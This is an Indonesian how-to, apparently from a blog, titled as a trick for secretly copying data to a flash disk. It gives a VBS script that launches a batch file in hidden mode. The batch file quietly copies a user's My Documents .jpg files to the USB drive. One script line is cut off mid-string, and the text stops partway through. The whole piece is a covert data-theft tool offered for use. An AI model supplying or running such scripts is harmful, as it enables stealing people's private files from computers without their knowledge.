Trik Copy Data Ke Flash Disk Secara Diam-diam
1.Buka notepad, buat file vbs ketik atau copy paste script berikut:
dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshshell.expandenvironmentstrings("%coms…
wshshell.run (dos & " /c tarik.bat"), vbhide
2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all files
3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:
@echo off
mkdir %computername%
xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" %computername% /s/c/q/r
@cls
@exit
4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files.
Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat)
Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer...